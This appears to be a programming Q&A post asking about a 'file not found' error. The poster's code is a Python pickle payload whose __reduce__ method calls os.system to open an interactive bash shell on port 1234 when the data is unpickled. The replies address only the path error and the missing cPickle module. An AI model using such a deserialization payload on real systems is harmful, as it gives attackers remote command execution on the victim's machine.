# I am using Pickle with python Getting error

Tags: python, pickle

```
import cPickle
import os

class Blah(object):
  def __reduce__(self):
    return (os.system,("telnet -c '/bin/bash -i' -l -p 1234 ",))

print cPickle.dumps(Blah())
```

error is:

```
python pickle.py 
python: can't open file '/home/bhumi/pickle.py': [Errno 2] No such file or directory
```

Comment: Nothing to do with pickle - the Python interpreter can't find the file to execute

Comment: The error doesn't appear to have anything to do with your code at all.  Either `pickle.py` is not actually the name of the file, or it's not in the current working directory.

Comment: file is missing or linux rights are not set properly, please check it.

Answer (score 0):

The error says that the file is not present in the path you specified, check the path. Moreover there is no `cpickle` in python3.

reference: [here](https://stackoverflow.com/questions/49579282/cant-find-module-cpickle-using-python-3-5-and-anaconda)